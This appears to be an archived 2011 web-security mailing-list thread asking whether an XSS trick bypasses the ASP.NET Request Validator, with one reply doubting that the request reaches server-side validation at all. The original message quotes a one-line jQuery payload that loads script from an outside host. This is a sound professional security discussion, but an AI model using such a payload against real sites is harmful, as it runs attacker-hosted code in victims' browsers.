[WEB SECURITY] ASP.NET Request Validator Bypass?

steve jensen sjensen1207 at hotmail.com
Sat Feb 19 13:04:52 EST 2011


If this jQuery .getScript request is only performed client-side, then it wouldn't even be sent to the server-side ASP.NET XSS validation to be bypassed.

Date: Sat, 19 Feb 2011 15:39:06 +0000
From: ryandewhurst at gmail.com
To: websecurity at webappsec.org
Subject: [WEB SECURITY] ASP.NET Request Validator Bypass?

Hi,

Recently on a client test I was able to bypass the ASP.NET Request Validator by leveraging the jQuery library which was included in the page. I am mainly a LAMP guy and my knowledge of ASP.NET and how to set it up is minimal. 


I was wondering if any one could confirm whether my bypass affects all ASP.NET installations or whether or not this particular client had it configured incorrectly.  

I used the following jQuery function to bypass the filter:

$.getScript('//ha.ckers.org/.j');


Thanks,
Ryan
Ryan Dewhurst

blog www.ethicalhack3r.co.uk
projects www.dvwa.co.uk | www.webwordcount.com

twitter www.twitter.com/ethicalhack3r


_______________________________________________
The Web Security Mailing List

WebSecurity RSS Feed
http://www.webappsec.org/rss/websecurity.rss

Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA

WASC on Twitter
http://twitter.com/wascupdates

websecurity at lists.webappsec.org
http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org 		 	   		  
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20110219/b40d6116/attachment-0003.html>


More information about the websecurity mailing list